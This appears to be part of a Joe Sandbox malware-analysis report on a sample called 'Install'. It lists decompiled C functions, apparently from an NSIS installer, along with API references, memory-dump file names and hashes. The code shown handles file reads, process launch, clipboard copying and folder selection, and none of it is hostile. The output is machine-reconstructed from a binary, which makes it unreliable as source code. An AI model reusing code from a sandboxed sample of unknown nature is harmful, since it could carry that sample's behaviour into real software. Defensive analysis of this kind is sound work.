                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                            0x004060b4
                            0x004060c4
                            0x004060cc
                            0x00000000
                            0x004060d3
                            0x00000000
                            0x004060d5

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                            0x004034f3
                            0x004034f9

                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7);
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                            0x00401faa
                            0x00401faf
                            0x00401fb5
                            0x00401fba
                            0x00401fbe
                            0x0040292e
                            0x00401fc4
                            0x00401fc7
                            0x00401fca
                            0x00401fd2
                            0x00401fe1
                            0x00401fe3
                            0x00401fe3
                            0x00401fd4
                            0x00401fd8
                            0x00401fd8
                            0x00401fd2
                            0x00401fea
                            0x00401feb
                            0x00401feb
                            0x00402c2d
                            0x00402c39

                            APIs
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                              • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                              • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                              • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                            • String ID:
                            • API String ID: 2972824698-0
                            • Opcode ID: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                            • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                            • Opcode Fuzzy Hash: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                            • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403B12 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00403B12() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403B57();
				return E00405C49(_t6, 0x443000, 7);
			}





                            0x00403b12
                            0x00403b1a
                            0x00403b1d
                            0x00403b23
                            0x00403b23
                            0x00403b23
                            0x00403b2a
                            0x00403b3b

                            APIs
                            • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                            • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                            • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                            • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                            0x004056e6
                            0x004056ec
                            0x004056f6
                            0x004056f9
                            0x0040588f
                            0x004058b3
                            0x004058b3
                            0x004058c6
                            0x004058e4
                            0x004058e6
                            0x004058ee
                            0x00405944
                            0x00405948
                            0x00000000
                            0x00000000
                            0x0040594a
                            0x00405950
                            0x00000000
                            0x00000000
                            0x0040595a
                            0x00405962
                            0x00405965
                            0x00405a67
                            0x00000000
                            0x00405a67
                            0x00405974
                            0x0040597f
                            0x00405988
                            0x00405993
                            0x00405996
                            0x0040599f
                            0x004059a5
                            0x004059a8
                            0x004059a8
                            0x004059c0
                            0x004059c9
                            0x004059cc
                            0x004059d3
                            0x004059da
                            0x004059e2
                            0x004059e2
                            0x004059f9
                            0x004059f9
                            0x00405a00
                            0x00405a06
                            0x00405a12
                            0x00405a19
                            0x00405a22
                            0x00405a24
                            0x00405a27
                            0x00405a36
                            0x00405a39
                            0x00405a3f
                            0x00405a40
                            0x00405a46
                            0x00405a47
                            0x00405a48
                            0x00405a50
                            0x00405a5b
                            0x00405a61
                            0x00405a61
                            0x00000000
                            0x004059c0
                            0x004058f6
                            0x00405926
                            0x0040592e
                            0x00405939
                            0x00405939
                            0x0040593f
                            0x00000000
                            0x0040593f
                            0x004058fa
                            0x00405904
                            0x00000000
                            0x004058c8
                            0x004058ce
                            0x00405909
                            0x00000000
                            0x00405912
                            0x004058d7
                            0x004058dc
                            0x004058df
                            0x00000000
                            0x004058df
                            0x004058c6
                            0x004056ff
                            0x00405703
                            0x0040570b
                            0x0040570f
                            0x00405712
                            0x00405715
                            0x00405718
                            0x0040571b
                            0x0040571c
                            0x0040571d
                            0x00405736
                            0x00405739
                            0x00405743
                            0x00405752
                            0x0040575a
                            0x00405762
                            0x00405767
                            0x0040576a
                            0x00405776
                            0x0040577f
                            0x00405788
                            0x004057aa
                            0x004057b0
                            0x004057c1
                            0x004057c6
                            0x004057d4
                            0x004057e2
                            0x004057e2
                            0x004057e7
                            0x004057f5
                            0x004057f5
                            0x004057fa
                            0x004057fd
                            0x00405802
                            0x0040580e
                            0x00405817
                            0x00405824
                            0x00405833
                            0x00405826
                            0x0040582b
                            0x0040582b
                            0x0040583f
                            0x0040583f
                            0x00405853
                            0x0040585c
                            0x00405865
                            0x00405875
                            0x00405881
                            0x00405881
                            0x00000000

                            APIs
                            • GetDlgItem.USER32 ref: 0040573C
                            • GetDlgItem.USER32 ref: 0040574B
                            • GetClientRect.USER32(?,?), ref: 00405788
                            • GetSystemMetrics.USER32 ref: 0040578F
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                            • GetDlgItem.USER32 ref: 0040584C
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                            • GetDlgItem.USER32 ref: 0040575A
                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                            • GetDlgItem.USER32 ref: 0040589E
                            • CreateThread.KERNEL32 ref: 004058AC
                            • CloseHandle.KERNEL32(00000000), ref: 004058B3
                            • ShowWindow.USER32(00000000), ref: 004058D7
                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                            • ShowWindow.USER32(00000008), ref: 00405926
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                            • CreatePopupMenu.USER32 ref: 0040596B
                            • AppendMenuW.USER32 ref: 0040597F
                            • GetWindowRect.USER32 ref: 0040599F
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                            • OpenClipboard.USER32(00000000), ref: 00405A00
                            • EmptyClipboard.USER32 ref: 00405A06
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                            • GlobalLock.KERNEL32 ref: 00405A1C
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                            • SetClipboardData.USER32 ref: 00405A5B
                            • CloseClipboard.USER32 ref: 00405A61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID: {
                            • API String ID: 590372296-366298937
                            • Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                            • Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040498A Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                            0x0040498a
                            0x00404990
                            0x00404996
                            0x004049a3
                            0x004049b1
                            0x004049b4
                            0x004049bc
                            0x004049c2
                            0x004049c2
                            0x004049ce
                            0x004049d1
                            0x00404a3f
                            0x00404a46
                            0x00404b1d
                            0x00404b24
                            0x00404b33
                            0x00404b33
                            0x00404b37
                            0x00404b41
                            0x00404b4e
                            0x00404b50
                            0x00404b50
                            0x00404b5e
